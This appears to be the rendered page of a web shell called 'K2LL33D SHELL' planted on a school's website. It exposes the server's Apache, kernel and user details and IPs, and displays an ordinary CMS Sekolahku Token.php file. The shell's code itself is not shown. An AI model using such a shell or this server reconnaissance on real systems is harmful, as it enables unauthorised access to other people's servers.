K2LL33D SHELL

 Apache/2.4.7 (Ubuntu)
 Linux sman1baleendah 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: OFF | WGet: ON
  >  / var / www / html / sman1baleendahoppppppp / application / libraries /
server ip : 104.21.89.46

your ip : 172.70.80.202

H O M E


Filename/var/www/html/sman1baleendahoppppppp/application/libraries/Token.php
Size1.62 kb
Permissionrw-r--r--
Ownerroot : root
Create time04-May-2025 17:23
Last modified04-May-2025 17:23
Last accessed07-Jul-2025 00:49
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<?php defined('BASEPATH') OR exit('No direct script access allowed');

/**
* CMS Sekolahku | CMS (Content Management System) dan PPDB/PMB Online GRATIS
* untuk sekolah SD/Sederajat, SMP/Sederajat, SMA/Sederajat, dan Perguruan Tinggi
* @version 2.4.13
* @author Anton Sofyan | https://facebook.com/antonsofyan | [email protected] | 0857 5988 8922
* @copyright (c) 2014-2023
* @link https://sekolahku.web.id
*
* PERINGATAN :
* 1. TIDAK DIPERKENANKAN MENGGUNAKAN CMS INI TANPA SEIZIN DARI PIHAK PENGEMBANG APLIKASI.
* 2. TIDAK DIPERKENANKAN MEMPERJUALBELIKAN APLIKASI INI TANPA SEIZIN DARI PIHAK PENGEMBANG APLIKASI.
* 3. TIDAK DIPERKENANKAN MENGHAPUS KODE SUMBER APLIKASI.
*/

class Token {

/**
* Reference to CodeIgniter instance
*
* @var object
*/
protected $CI;

/**
* @var token
* @access private
*/
private $token;

/**
* @var old token
* @access private
*/
private $old_token;

/**
* Class Constructor
*
* @return Void
*/
public function __construct() {
$this->CI = &get_instance();
if (NULL !== __session('token')) {
$this->old_token = __session('token');
}
}

/**
* Set Token
* @return String
*/
private function set_token() {
$ip = $_SERVER['REMOTE_ADDR'];
$uniqid = uniqid(mt_rand(), true);
return md5($ip . $uniqid);
}

/**
* Get Token
* @return String
*/
public function get_token() {
$this->token = $this->set_token();
$this->CI->session->set_userdata('token', $this->token);
return $this->token;
}

/**
* Token validated
* @return Boolean
*/
public function is_valid_token($token) {
return $token === $this->old_token;
}
}